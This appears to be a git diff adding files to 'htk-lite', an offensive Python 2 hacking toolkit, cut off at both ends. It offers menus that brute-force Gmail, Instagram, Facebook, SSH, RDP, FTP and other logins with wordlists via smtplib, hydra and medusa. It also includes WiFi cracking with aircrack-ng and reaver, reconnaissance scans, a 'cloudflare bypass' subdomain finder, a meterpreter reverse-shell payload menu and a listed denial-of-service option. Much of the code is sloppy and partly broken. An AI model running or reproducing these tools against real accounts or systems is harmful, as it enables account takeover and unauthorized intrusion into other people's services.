[\033[31m6\033[0m] ║ +║══════════════════════════════════════════════════════════════════════════════════════╗ +║ ? | this menu ║ +║ exit | exit htkl ║ +║ clear | clears screen ║ +║ banner | shows a banner ║ +║ infoscan | gather information on a host [for a more specific scan type infoscan -o] ║ +║ dos | run Denial-Of-Service attacks ║ +║ ║ +║ ║ +║ \033[5m@tuf_unkn0wn\033[0m ║ +╚══════════════════════════════════════════════════════════════════════════════════════╝ + \033[0m\n""".format(b) +helpbanner() diff --git a/htk-lite/commandlist/infoscan-o.py b/htk-lite/commandlist/infoscan-o.py new file mode 100644 index 0000000..ef19d93 --- /dev/null +++ b/htk-lite/commandlist/infoscan-o.py @@ -0,0 +1,176 @@ +#!/usr/local/bin/python +# coding: latin-1 +#if you use this code give me credit @tuf_unkn0wn +#i do not give you permission to show / edit this script without my credit +#to ask questions or report a problem message me on instagram @tuf_unkn0wn +""" + + + ██░ ██ ▄▄▄ ▄████▄ ██ ▄█▀▓█████ ▓█████▄ +▓██░ ██▒▒████▄ ▒██▀ ▀█ ██▄█▒ ▓█ ▀ ▒██▀ ██▌ +▒██▀▀██░▒██ ▀█▄ ▒▓█ ▄ ▓███▄░ ▒███ ░██ █▌ +░▓█ ░██ ░██▄▄▄▄██ ▒▓▓▄ ▄██▒▓██ █▄ ▒▓█ ▄ ░▓█▄ ▌ +░▓█▒░██▓ ▓█ ▓██▒▒ ▓███▀ ░▒██▒ █▄░▒████▒░▒████▓ + ▒ ▒░▒ ▒▒ ▓▒█ ░▒ ▒ ░▒ ▒▒ ▓▒ ▒░ ░ ▒▒▓ ▒ + ▒ ░▒░ ░ ▒ ▒▒ ░ ░ ▒ ░ ░▒ ▒░ ░ ░ ░ ░ ▒ ▒ + ░ ░ ░ ▒ ░ ░ ░ ░ ░ ░ ░ + ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ + ░ ░ + + +""" +import os +import sys +import random +lred = '\033[91m' +lblue = '\033[94m' +lgreen = '\033[92m' +yellow = '\033[93m' +cyan = '\033[1;36m' +purple = '\033[95m' +red = '\033[31m' +green = '\033[32m' +blue = '\033[34m' +orange = '\033[33m' + +colorlist = [red, blue, green, yellow, lblue, purple, cyan, lred, lgreen, orange] +randomcolor = random.choice(colorlist) +banner3list = [red, blue, green, purple] +def specscan(): + print """\033[1m +Scans Available:\033[0m + +1: simple nmap portscan + +2: show document info of target with curl + +3: nmap OS detection, version detection, script scanning, and traceroute scan + +4: nmap dns bruteforce + +5: get a hosts ip address + +6: check if a host is online + +7: who-is lookup + +8: dns-lookup + +9: get a hosts source code + +10: web application firewall scanner + +11: run a ssl scan + +12: find the location of a ip address + +13: reverse ip lookup + +14: host search + +15: reverse dns + +16: find shared dns + +17: cloudflare bypass + +18: sslscan + +19: directory scan / bruteforce + +20: nikto scan [this might take awhile to finish] + +go back: go back to main menu + + """ + print "Type a number then your target Ex: 5 www.pornhub.com\n" + j = False + while not j: + try: + option, target = raw_input("\033[1mScan:\033[0m ").split() + if option == "1": + os.system("nmap {0}".format(target)) + if option == "2": + os.system("curl -I {0}".format(target)) + if option == "3": + os.system("nmap -A {0}".format(target)) + if option == "4": + os.system("nmap --script dns-brute {0}".format(target)) + if option == "5": + ip = socket.gethostbyname(target) + print """ + Host: {0} + IP: {1} + """.format(target, ip) + if option == "6": + ht = raw_input("\033[1mHTTP or HTTPS:\033[0m ") + if ht == "https": + targetht = "https://" + if ht == "http": + targetht = "http://" + request = requests.get(targetht + target) + http = request.status_code + if http == 200: + print("\nServer: [\033[32monline\033[0m]") + else: + print("\nServer: [\033[31moffline\033[0m]") + if option == "7": + whois = requests.get("https://api.hackertarget.com/whois/?q=" + target).content.decode("UTF-8") + print(whois) + if option == "8": + os.system("curl https://api.hackertarget.com/dnslookup/?q={0}".format(target)) + if option == "9": + os.system("curl {0}".format(target)) + if option == "10": + os.system("wafw00f {0}".format(target)) + if option == "11": + os.system("sslscan {0}".format(target)) + if option == "12": + os.system("curl https://api.hackertarget.com/geoip/?q={0}".format(target)) + if option == "13": + os.system("curl https://api.hackertarget.com/reverseiplookup/?q={0}".format(target)) + if option == "14": + os.system("curl https://api.hackertarget.com/hostsearch/?q={0}".format(target)) + if option == "15": + os.system("curl https://api.hackertarget.com/reversedns/?q={0}".format(target)) + if option == "16": + os.system("curl https://api.hackertarget.com/findshareddns/?q={0}".format(target)) + if option == "17": + def daf(): + subdomainlist = ["ftp", "cpanel", "webmail", "localhost", "local", "mysql", "forum", "driect-connect", "blog", + "vb", "forums", "home", "direct", "forums", "mail", "access", "admin", "administrator", + "email", "downloads", "ssh", "owa", "bbs", "webmin", "paralel", "parallels", "www0", "www", + "www1", "www2", "www3", "www4", "www5", "shop", "api", "blogs", "test", "mx1", "cdn", "mysql", + "mail1", "secure", "server", "ns1", "ns2", "smtp", "vpn", "m", "mail2", "postal", "support", + "web", "dev"] + + for sublist in subdomainlist: + try: + hosts = str(sublist) + "." + str(target) + showip = socket.gethostbyname(str(hosts)) + print "\033[0m\033[32mHIT\033[0m:\033[1m " + str(showip) + ' | ' + str(hosts) + except: + print "\033[0mBypassing..." + + daf() + if option == "18": + a = 'sslscan {0}'.format(target) + os.system(a) + if option == "19": + ht = raw_input("HTTP or HTTPS: ") + if ht == "https": + targetht = "https://" + if ht == "http": + targetht = "http://" + a = 'dirb {0}{1}/'.format(targetht,target) + os.system(a) + if option == "20": + port = raw_input("\033[1mPort:\033[0m ") + os.system("nikto -h {0} -p {1}".format(target,port)) + if target == "back": + break + except: + print "\n" + break + j = True +specscan() diff --git a/htk-lite/commandlist/infoscan.py b/htk-lite/commandlist/infoscan.py new file mode 100644 index 0000000..7cab9a1 --- /dev/null +++ b/htk-lite/commandlist/infoscan.py @@ -0,0 +1,117 @@ +#!/usr/local/bin/python +# coding: latin-1 +#if you use this code give me credit @tuf_unkn0wn +#i do not give you permission to show / edit this script without my credit +#to ask questions or report a problem message me on instagram @tuf_unkn0wn +""" + + + ██░ ██ ▄▄▄ ▄████▄ ██ ▄█▀▓█████ ▓█████▄ +▓██░ ██▒▒████▄ ▒██▀ ▀█ ██▄█▒ ▓█ ▀ ▒██▀ ██▌ +▒██▀▀██░▒██ ▀█▄ ▒▓█ ▄ ▓███▄░ ▒███ ░██ █▌ +░▓█ ░██ ░██▄▄▄▄██ ▒▓▓▄ ▄██▒▓██ █▄ ▒▓█ ▄ ░▓█▄ ▌ +░▓█▒░██▓ ▓█ ▓██▒▒ ▓███▀ ░▒██▒ █▄░▒████▒░▒████▓ + ▒ ▒░▒ ▒▒ ▓▒█ ░▒ ▒ ░▒ ▒▒ ▓▒ ▒░ ░ ▒▒▓ ▒ + ▒ ░▒░ ░ ▒ ▒▒ ░ ░ ▒ ░ ░▒ ▒░ ░ ░ ░ ░ ▒ ▒ + ░ ░ ░ ▒ ░ ░ ░ ░ ░ ░ ░ + ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ + ░ ░ + + +""" +import os +import sys +import random +lred = '\033[91m' +lblue = '\033[94m' +lgreen = '\033[92m' +yellow = '\033[93m' +cyan = '\033[1;36m' +purple = '\033[95m' +red = '\033[31m' +green = '\033[32m' +blue = '\033[34m' +orange = '\033[33m' + +colorlist = [red, blue, green, yellow, lblue, purple, cyan, lred, lgreen, orange] +randomcolor = random.choice(colorlist) +banner3list = [red, blue, green, purple] + +def infoscan(): + try: + target = raw_input("\033[1mTarget:\033[0m ") + port = raw_input("\033[1mPort:\033[0m ") + print "\033[93m! HTTP OR HTTPS !\033[0m\n" + ht = raw_input("[https/http]: ") + if ht == "http": + targetht = 'http://' + if ht == "https": + targetht = 'https://' + print "\033[31m-----\033[33m-----\033[93m-----\033[32m-----\033[1;36m-----\033[94m-----\033[95m-----\033[31m-----\033[33m-----\033[93m-----\033[32m-----\033[1;36m-----\033[94m-----\033[95m-----\033[0m\n" + os.system("curl {0}".format(target)) + print "\n" + ip = socket.gethostbyname(target) + print G+"------------------------\033[0m" + print N+"\033[1mHost:\033[32m ", target + print N+"\033[1mIP:\033[32m ", ip + print G+"------------------------\033[0m" + os.system("curl -I {0}".format(target)) + print "\n" + request = requests.get(targetht + target) + http = request.status_code + if http == 200: + print("\nServer: [\033[32monline\033[0m]") + else: + print("\nServer: [\033[31moffline\033[0m]") + exit() + print "\n" + whois = requests.get("https://api.hackertarget.com/whois/?q=" + target).content.decode("UTF-8") + print(whois) + print "\n" + os.system("curl https://api.hackertarget.com/dnslookup/?q={0}".format(target)) + print "\n" + os.system("wafw00f {0}".format(target)) + print "\n" + os.system("sslscan {0}".format(target)) + print "\n" + os.system("curl https://api.hackertarget.com/geoip/?q={0}".format(target)) + print "\n" + os.system("curl https://api.hackertarget.com/reverseiplookup/?q={0}".format(target)) + print "\n" + os.system("curl https://api.hackertarget.com/hostsearch/?q={0}".format(target)) + print "\n" + os.system("curl https://api.hackertarget.com/reversedns/?q={0}".format(target)) + print "\n" + os.system("curl https://api.hackertarget.com/findshareddns/?q={0}".format(target)) + print "\n" + def daf(): + subdomainlist = ["ftp", "cpanel", "webmail", "localhost", "local", "mysql", "forum", "driect-connect", "blog", + "vb", "forums", "home", "direct", "forums", "mail", "access", "admin", "administrator", + "email", "downloads", "ssh", "owa", "bbs", "webmin", "paralel", "parallels", "www0", "www", + "www1", "www2", "www3", "www4", "www5", "shop", "api", "blogs", "test", "mx1", "cdn", "mysql", + "mail1", "secure", "server", "ns1", "ns2", "smtp", "vpn", "m", "mail2", "postal", "support", + "web", "dev"] + + for sublist in subdomainlist: + try: + hosts = str(sublist) + "." + str(target) + showip = socket.gethostbyname(str(hosts)) + print "\033[0m\033[32mHIT\033[0m:\033[1m " + str(showip) + ' | ' + str(hosts) + except: + print "\033[0mBypassing..." + + daf() + print "\033[0m" + print "\n" + os.system("nmap -A {0}".format(target)) + print "\n" + os.system("nmap --script dns-brute {0}".format(target)) + print "\n" + a = 'dirb {0}{1}/'.format(targetht,target) + os.system(a) + print "\n" + os.system("nikto -h {0} -p {1}".format(target,port)) + print "\n\033[31m-----\033[33m-----\033[93m-----\033[32m-----\033[1;36m-----\033[94m-----\033[95m-----\033[31m-----\033[33m-----\033[93m-----\033[32m-----\033[1;36m-----\033[94m-----\033[95m-----\033[0m" + except: + print "\033[91mError Something Went Wrong Maybe The Specified Target Is Not Available\033[0m" +infoscan() diff --git a/htk-lite/commandlist/monitor-off.py b/htk-lite/commandlist/monitor-off.py new file mode 100644 index 0000000..33c8329 --- /dev/null +++ b/htk-lite/commandlist/monitor-off.py @@ -0,0 +1,44 @@ +#!/usr/local/bin/python +# coding: latin-1 +#if you use this code give me credit @tuf_unkn0wn +#i do not give you permission to show / edit this script without my credit +#to ask questions or report a problem message me on instagram @tuf_unkn0wn +""" + + + ██░ ██ ▄▄▄ ▄████▄ ██ ▄█▀▓█████ ▓█████▄ +▓██░ ██▒▒████▄ ▒██▀ ▀█ ██▄█▒ ▓█ ▀ ▒██▀ ██▌ +▒██▀▀██░▒██ ▀█▄ ▒▓█ ▄ ▓███▄░ ▒███ ░██ █▌ +░▓█ ░██ ░██▄▄▄▄██ ▒▓▓▄ ▄██▒▓██ █▄ ▒▓█ ▄ ░▓█▄ ▌ +░▓█▒░██▓ ▓█ ▓██▒▒ ▓███▀ ░▒██▒ █▄░▒████▒░▒████▓ + ▒ ▒░▒ ▒▒ ▓▒█ ░▒ ▒ ░▒ ▒▒ ▓▒ ▒░ ░ ▒▒▓ ▒ + ▒ ░▒░ ░ ▒ ▒▒ ░ ░ ▒ ░ ░▒ ▒░ ░ ░ ░ ░ ▒ ▒ + ░ ░ ░ ▒ ░ ░ ░ ░ ░ ░ ░ + ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ + ░ ░ + + +""" +import os +import sys +import random +lred = '\033[91m' +lblue = '\033[94m' +lgreen = '\033[92m' +yellow = '\033[93m' +cyan = '\033[1;36m' +purple = '\033[95m' +red = '\033[31m' +green = '\033[32m' +blue = '\033[34m' +orange = '\033[33m' + +colorlist = [red, blue, green, yellow, lblue, purple, cyan, lred, lgreen, orange] +randomcolor = random.choice(colorlist) +banner3list = [red, blue, green, purple] + +def monitoroff(): + os.system("iwconfig") + i = raw_input("Select Interface: ") + os.system("airmon-ng stop " + i) +monitoroff() diff --git a/htk-lite/commandlist/monitor-on.py b/htk-lite/commandlist/monitor-on.py new file mode 100644 index 0000000..5893fea --- /dev/null +++ b/htk-lite/commandlist/monitor-on.py @@ -0,0 +1,44 @@ +#!/usr/local/bin/python +# coding: latin-1 +#if you use this code give me credit @tuf_unkn0wn +#i do not give you permission to show / edit this script without my credit +#to ask questions or report a problem message me on instagram @tuf_unkn0wn +""" + + + ██░ ██ ▄▄▄ ▄████▄ ██ ▄█▀▓█████ ▓█████▄ +▓██░ ██▒▒████▄ ▒██▀ ▀█ ██▄█▒ ▓█ ▀ ▒██▀ ██▌ +▒██▀▀██░▒██ ▀█▄ ▒▓█ ▄ ▓███▄░ ▒███ ░██ █▌ +░▓█ ░██ ░██▄▄▄▄██ ▒▓▓▄ ▄██▒▓██ █▄ ▒▓█ ▄ ░▓█▄ ▌ +░▓█▒░██▓ ▓█ ▓██▒▒ ▓███▀ ░▒██▒ █▄░▒████▒░▒████▓ + ▒ ▒░▒ ▒▒ ▓▒█ ░▒ ▒ ░▒ ▒▒ ▓▒ ▒░ ░ ▒▒▓ ▒ + ▒ ░▒░ ░ ▒ ▒▒ ░ ░ ▒ ░ ░▒ ▒░ ░ ░ ░ ░ ▒ ▒ + ░ ░ ░ ▒ ░ ░ ░ ░ ░ ░ ░ + ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ + ░ ░ + + +""" +import os +import sys +import random +lred = '\033[91m' +lblue = '\033[94m' +lgreen = '\033[92m' +yellow = '\033[93m' +cyan = '\033[1;36m' +purple = '\033[95m' +red = '\033[31m' +green = '\033[32m' +blue = '\033[34m' +orange = '\033[33m' + +colorlist = [red, blue, green, yellow, lblue, purple, cyan, lred, lgreen, orange] +randomcolor = random.choice(colorlist) +banner3list = [red, blue, green, purple] + +def monitoron(): + os.system("iwconfig") + i = raw_input("Select Interface: ") + os.system("airmon-ng start " + i) +monitoron() diff --git a/htk-lite/commandlist/netscan.py b/htk-lite/commandlist/netscan.py new file mode 100644 index 0000000..d2e0783 --- /dev/null +++ b/htk-lite/commandlist/netscan.py @@ -0,0 +1,72 @@ +#!/usr/local/bin/python +# coding: latin-1 +#if you use this code give me credit @tuf_unkn0wn +#i do not give you permission to show / edit this script without my credit +#to ask questions or report a problem message me on instagram @tuf_unkn0wn +""" + + + ██░ ██ ▄▄▄ ▄████▄ ██ ▄█▀▓█████ ▓█████▄ +▓██░ ██▒▒████▄ ▒██▀ ▀█ ██▄█▒ ▓█ ▀ ▒██▀ ██▌ +▒██▀▀██░▒██ ▀█▄ ▒▓█ ▄ ▓███▄░ ▒███ ░██ █▌ +░▓█ ░██ ░██▄▄▄▄██ ▒▓▓▄ ▄██▒▓██ █▄ ▒▓█ ▄ ░▓█▄ ▌ +░▓█▒░██▓ ▓█ ▓██▒▒ ▓███▀ ░▒██▒ █▄░▒████▒░▒████▓ + ▒ ▒░▒ ▒▒ ▓▒█ ░▒ ▒ ░▒ ▒▒ ▓▒ ▒░ ░ ▒▒▓ ▒ + ▒ ░▒░ ░ ▒ ▒▒ ░ ░ ▒ ░ ░▒ ▒░ ░ ░ ░ ░ ▒ ▒ + ░ ░ ░ ▒ ░ ░ ░ ░ ░ ░ ░ + ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ + ░ ░ + + +""" +import os +import sys +import random +import socket +import socks +import requests +lred = '\033[91m' +lblue = '\033[94m' +lgreen = '\033[92m' +yellow = '\033[93m' +cyan = '\033[1;36m' +purple = '\033[95m' +red = '\033[31m' +green = '\033[32m' +blue = '\033[34m' +orange = '\033[33m' + +colorlist = [red, blue, green, yellow, lblue, purple, cyan, lred, lgreen, orange] +randomcolor = random.choice(colorlist) +banner3list = [red, blue, green, purple] + +def netscan(): + print """ +{0}1: scan for devices in your network + +{1}2: scan for networks around you +\033[0m +go back: go back to main menu + """.format(random.choice(colorlist), random.choice(colorlist)) + try: + choice = raw_input("\033[1mScan:\033[0m ") + + if choice == "1": + os.system("netdiscover") + if choice == "2": + os.system("iwconfig") + m = raw_input("\033[1mSelect Interface:\033[0m ") + os.system("airmon-ng start " + m) + print Y+"WOULD YOU LIKE TO SAVE YOUR SCAN RESULTS?\033[0m" + j = raw_input("\033[1m[y/n]>\033[0m ") + if j == "y": + os.system("airodump-ng -w /root/SCAN " + m) + print Y+"! SCAN RESULTS SAVED IN /root/ DIRECTORY !\033[0m" + if j == "n": + os.system("airodump-ng " + m) + os.system("airmon-ng stop " + i) + if choice == "go back": + os.system("") + except: + print "\n" +netscan() diff --git a/htk-lite/commandlist/password.py b/htk-lite/commandlist/password.py new file mode 100644 index 0000000..e21020c --- /dev/null +++ b/htk-lite/commandlist/password.py @@ -0,0 +1,385 @@ +#!/usr/local/bin/python +# coding: latin-1 +#if you use this code give me credit @tuf_unkn0wn +#i do not give you permission to show / edit this script without my credit +#to ask questions or report a problem message me on instagram @tuf_unkn0wn +""" + + + ██░ ██ ▄▄▄ ▄████▄ ██ ▄█▀▓█████ ▓█████▄ +▓██░ ██▒▒████▄ ▒██▀ ▀█ ██▄█▒ ▓█ ▀ ▒██▀ ██▌ +▒██▀▀██░▒██ ▀█▄ ▒▓█ ▄ ▓███▄░ ▒███ ░██ █▌ +░▓█ ░██ ░██▄▄▄▄██ ▒▓▓▄ ▄██▒▓██ █▄ ▒▓█ ▄ ░▓█▄ ▌ +░▓█▒░██▓ ▓█ ▓██▒▒ ▓███▀ ░▒██▒ █▄░▒████▒░▒████▓ + ▒ ▒░▒ ▒▒ ▓▒█ ░▒ ▒ ░▒ ▒▒ ▓▒ ▒░ ░ ▒▒▓ ▒ + ▒ ░▒░ ░ ▒ ▒▒ ░ ░ ▒ ░ ░▒ ▒░ ░ ░ ░ ░ ▒ ▒ + ░ ░ ░ ▒ ░ ░ ░ ░ ░ ░ ░ + ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ + ░ ░ + + +""" +import os +import sys +import random +import socket +import socks +import requests +lred = '\033[91m' +lblue = '\033[94m' +lgreen = '\033[92m' +yellow = '\033[93m' +cyan = '\033[1;36m' +purple = '\033[95m' +red = '\033[31m' +green = '\033[32m' +blue = '\033[34m' +orange = '\033[33m' + +colorlist = [red, blue, green, yellow, lblue, purple, cyan, lred, lgreen, orange] +randomcolor = random.choice(colorlist) +banner3list = [red, blue, green, purple] +def gmail(): + + def main(): + print '\033[93m=================================================' + print '\033[91m create by Ha3MrX ' + print '\033[93m=================================================' + print '\033[95m ++++++++++++++++++++ ' + print '\n ' + print '\033[92m _,. ' + print ' ' + print ' ' + print ' HA3MrX ' + print ' _,. ' + print ' ,` -.) ' + print ' ( _/-\\-._ ' + print ' /,|`--._,-^| , ' + print ' \_| |`-._/|| , | ' + print ' | `-, / | / / ' + print ' | || | / / ' + print ' `r-._||/ __ / / ' + print ' __,-<_ )`-/ `./ / ' + print ' \ `--- \ / / / ' + print ' | |./ / ' + print ' / // / ' + print ' \_/ \ |/ / ' + print ' | | _,^- / / ' + print ' | , `` (\/ /_ ' + print ' \,.->._ \X-=/^ ' + print ' ( / `-._//^` ' + print ' `Y-.____(__} ' + print ' | {__) ' + print ' () \033[91m V.1.0 ' + + main() + print '\033[0m[1] start the attack' + print '[2] exit' + option = input('==>') + if option == 1: + file_path = raw_input('path of passwords file :') + else: + system('clear') + exit() + pass_file = open(file_path,'r') + pass_list = pass_file.readlines() + def login(): + i = 0 + user_name = raw_input('target email :') + server = smtplib.SMTP_SSL('smtp.gmail.com', 465) + server.ehlo() + for password in pass_list: + i = i + 1 + print str(i) + '/' + str(len(pass_list)) + try: + server.login(user_name, password) + system('clear') + main() + print '\n' + print '[+] This Account Has Been Hacked Password :' + password + ' ^_^' + break + except smtplib.SMTPAuthenticationError as e: + error = str(e) + if error[14] == '<': + system('clear') + main() + print '[+] this account has been hacked, password :' + password + ' ^_^' + + break + else: + print '[!] password not found => ' + password + login() + +def insta(): + insta = raw_input("\033[1mUsername:\033[0m ") + jl = raw_input("\033[1mWordlist:\033[0m ") + print "\033[1m\033[94m\nMODES>: [0] fastest, [1] fast, [2] slow, [3] slowest\033[0m\n" + k = raw_input("\033[1mMode:\033[0m ") + ma = 'python3 files/Instagram/instagram.py {0} {1} -m {2}'.format(insta,jl,k) + os.system(ma) + +def fb(): + facebook = raw_input("\033[1m[EMAIL/ID->]:\033[0m ") + word = raw_input("\033[1m[WORDLIST->]:\033[0m ") + ks = 'cd files && perl fb-brute.pl {0} {1}'.format(facebook,word) + os.system(ks) +def blackhydra(): + def restart_program(): + python = sys.executable + os.execl(python, python, * sys.argv) + curdir = os.getcwd() + ############################## + + os.system("clear") + print B+"___ _ ____ ____ _ _ _ _ _ _ ___ ____ ____" + print "|__] | |__| | |_/ |__| \_/ | \ |__/ |__|" + print "|__] |___ | | |___ | \_ | | | |__/ | \ | |" + print G+"-----------------------------------------------------" + print N+"[]xxxxx[]::::::::::::::::::::> 24-07-2017 (7:53)" + print R+" [*] Author: DedSecTL --- [*] Version 1.0" + print N+"c=={:::::::::::::::> Black Hydra Console" + print R+" [*] My FB : https://m.facebook.com/100004136748473" + print N+"(}xxx{):::::::::> AndroSec1337 Cyber Team" + print + print " ===|[ Brute Force ]|===" + print + print " [01] Cisco Brute Force " + print " [02] VNC Brute Force " + print " [03] FTP Brute Force " + print " [04] Gmail Brute Force " + print " [05] SSH Brute Force " + print " [06] TeamSpeak Brute Force " + print " [07] Telnet Brute Force " + print " [08] Yahoo Mail Brute Force " + print " [09] Hotmail Brute Force " + print " [10] Router Speedy Brute Force " + print " [11] RDP Brute Force " + print " [12] MySQL Brute Force " + print + print " [00] Exit" + print + bhydra = raw_input("[*] B-Hydra > ") + + if bhydra == '01' or bhydra == '1': + print + print " +---------------------------+" + print " | Cisco Brute Force |" + print " +---------------------------+" + print + print + iphost = raw_input("[*] IP/Hostname : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -P %s %s cisco" % (word, iphost)) + sys.exit() + + elif bhydra == '02' or bhydra == '2': + print + print " +---------------------------+" + print " | VNC Brute Force |" + print " +---------------------------+" + print + print + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -P %s -e n -t 1 %s vnc -V" % (word, iphost)) + iphost = raw_input("[*] IP/Hostname : ") + + elif bhydra == '03' or bhydra == '3': + print + print " +------------------------------+" + print " | FTP Brute Force |" + print " +------------------------------+" + print + print + user = raw_input("[*] User : ") + iphost = raw_input("[*] IP/Hostname : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -l %s -P %s %s ftp" % (user, word, iphost)) + sys.exit() + + elif bhydra == '04' or bhydra == '4': + print + print " +------------------------------+" + print " | Gmail Brute Force |" + print " +------------------------------+" + print + print + email = raw_input("[*] Email : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -l %s -P %s -s 465 smtp.gmail.com smtp" % (email, word)) + sys.exit() + + elif bhydra == '05' or bhydra == '5': + print + print " +--------------------------------+" + print " | SSH Brute Force |" + print " +--------------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -l %s -P %s %s ssh" % (user, word, iphost)) + sys.exit() + + elif bhydra == '06' or bhydra == '6': + print + print " +-------------------------+" + print " | TeamSpeak Brute Force |" + print " +-------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -l %s -P %s -s 8676 %s teamspeak" % (user, word, iphost)) + sys.exit() + + elif bhydra == '07' or bhydra == '7': + print + print " +-------------------------+" + print " | Telnet Brute Force |" + print " +-------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -l %s -P %s %s telnet" % (user, word, iphost)) + sys.exit() + + elif bhydra == '08' or bhydra == '8': + print + print " +---------------------------+" + print " | Yahoo Brute Force |" + print " +---------------------------+" + print + print + email = raw_input("[*] Email : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -l %s -P %s -s 587 smtp.mail.yahoo.com smtp" % (email, word)) + sys.exit() + + elif bhydra == '09' or bhydra == '9': + print + print " +----------------------------+" + print " | Hotmail Brute Force |" + print " +----------------------------+" + print + print + email = raw_input("[*] Email : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -l %s -P %s -s 587 smtp.live.com smtp" % (email, word)) + sys.exit() + + elif bhydra == '10': + print + print " +-----------------------------+" + print " | Router Speedy Brute Force |" + print " +-----------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -m / -l %s -P %s %s http-get" % (user, word, iphost)) + sys.exit() + + elif bhydra == '11': + print + print " +----------------------------+" + print " | RDP Brute Force |" + print " +----------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -t 1 -V -f -l %s -P %s %s rdp" % (user, word, iphost)) + sys.exit() + + elif bhydra == '12': + print + print " +-----------------------------+" + print " | MySQL Brute Force |" + print " +-----------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -t 5 -V -f -l %s -e ns -P %s localhost mysql" % (user, word)) + + elif bhydra == '00' or bhydra == '0': + print "\n[!] Exit the Program..." + sys.exit() + + else: + print "\n[!] ERROR : Wrong Input" + time.sleep(1) + restart_program() + +def medusa(): + k = raw_input("\033[1mHost:\033[0m ") + u = raw_input("\033[1mUser:\033[0m ") + p = raw_input("\033[1mWordlist:\033[0m ") + os.system("medusa -d") + print "\n" + m = raw_input("\033[1mModule:\033[0m ") + n = raw_input("\033[1mPort:\033[0m ") + a = 'medusa -h {0} -u {1} -P {2} -M {3} -n {4}'.format(k,u,p,m,n) + os.system(a) + +def aircrack(): + b = raw_input(G+"\033[1mBSSID: \033[0m") + e = raw_input(G+"\033[1mESSID: \033[0m") + w = raw_input(G+"\033[1mWordlist: \033[0m") + h = raw_input(G+"\033[1mHandshake file: \033[0m") + os.system("iwconfig") + i = raw_input(G+"\033[1mInterface: \033[0m") + os.system("airmon-ng start" + i) + a = 'aircrack-ng -b {0} -e {1} -w {2} {3} {4}' + os.system(a) + os.system("airmon-ng stop" + i) + +def reaver(): + os.system("iwconfig") + j = raw_input("\033[1mSelect Interface:\033[0m ") + k = raw_input("\033[1mEnter BSSID:\033[0m ") + a = 'reaver -i {0} -b {1} -vv'.format(j,k) + os.system(a) + +def password(): + print """ +{0}1: gmail +{1}2: instagram +{2}3: facebook +{3}4: hydra +{4}5: medusa +{5}6: aircrack-ng +{6}7: reaver +\033[0m +go back: go to main menu + """.format(random.choice(colorlist), random.choice(colorlist), random.choice(colorlist), random.choice(colorlist), random.choice(colorlist), random.choice(colorlist), random.choice(colorlist)) + try: + choice = raw_input("\033[1mAttack:\033[0m ") + if choice == "1": + gmail() + if choice == "2": + insta() + if choice == "3": + fb() + if choice == "4": + blackhydra() + if choice == "5": + medusa() + if choice == "6": + aircrack() + if choice == "7": + reaver() + if choice == "go back": + os.system("") + + except: + print "\n" + +password() diff --git a/htk-lite/commandlist/payload.py b/htk-lite/commandlist/payload.py new file mode 100644 index 0000000..998de4c --- /dev/null +++ b/htk-lite/commandlist/payload.py @@ -0,0 +1,84 @@ +#!/usr/local/bin/python +# coding: latin-1 +#if you use this code give me credit @tuf_unkn0wn +#i do not give you permission to show / edit this script without my credit +#to ask questions or report a problem message me on instagram @tuf_unkn0wn +""" + + + ██░ ██ ▄▄▄ ▄████▄ ██ ▄█▀▓█████ ▓█████▄ +▓██░ ██▒▒████▄ ▒██▀ ▀█ ██▄█▒ ▓█ ▀ ▒██▀ ██▌ +▒██▀▀██░▒██ ▀█▄ ▒▓█ ▄ ▓███▄░ ▒███ ░██ █▌ +░▓█ ░██ ░██▄▄▄▄██ ▒▓▓▄ ▄██▒▓██ █▄ ▒▓█ ▄ ░▓█▄ ▌ +░▓█▒░██▓ ▓█ ▓██▒▒ ▓███▀ ░▒██▒ █▄░▒████▒░▒████▓ + ▒ ▒░▒ ▒▒ ▓▒█ ░▒ ▒ ░▒ ▒▒ ▓▒ ▒░ ░ ▒▒▓ ▒ + ▒ ░▒░ ░ ▒ ▒▒ ░ ░ ▒ ░ ░▒ ▒░ ░ ░ ░ ░ ▒ ▒ + ░ ░ ░ ▒ ░ ░ ░ ░ ░ ░ ░ + ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ + ░ ░ + + +""" +import os +import sys +import random +lred = '\033[91m' +lblue = '\033[94m' +lgreen = '\033[92m' +yellow = '\033[93m' +cyan = '\033[1;36m' +purple = '\033[95m' +red = '\033[31m' +green = '\033[32m' +blue = '\033[34m' +orange = '\033[33m' + +colorlist = [red, blue, green, yellow, lblue, purple, cyan, lred, lgreen, orange] +randomcolor = random.choice(colorlist) +banner3list = [red, blue, green, purple] + +def payload(): + print """\033[0m033[1m +Payloads Available:\033[0m + +{0}1: windows/meterpreter/reverse_tcp + +{1}2: android/meterpreter/reverse_tcp + +{2}3: php/meterpreter/reverse_tcp + +{3}4: python/meterpreter/reverse_tcp + +{4}5: ruby/shell_reverse_tcp + +{5}6: osx/x86/vforkshell/reverse_tcp + +{6}7: linux/aarch64/meterpreter/reverse_tcp + + \033[0m""".format(random.choice(colorlist), random.choice(colorlist), random.choice(colorlist), random.choice(colorlist), random.choice(colorlist), random.choice(colorlist), random.choice(colorlist)) + choice = raw_input("Payload: ") 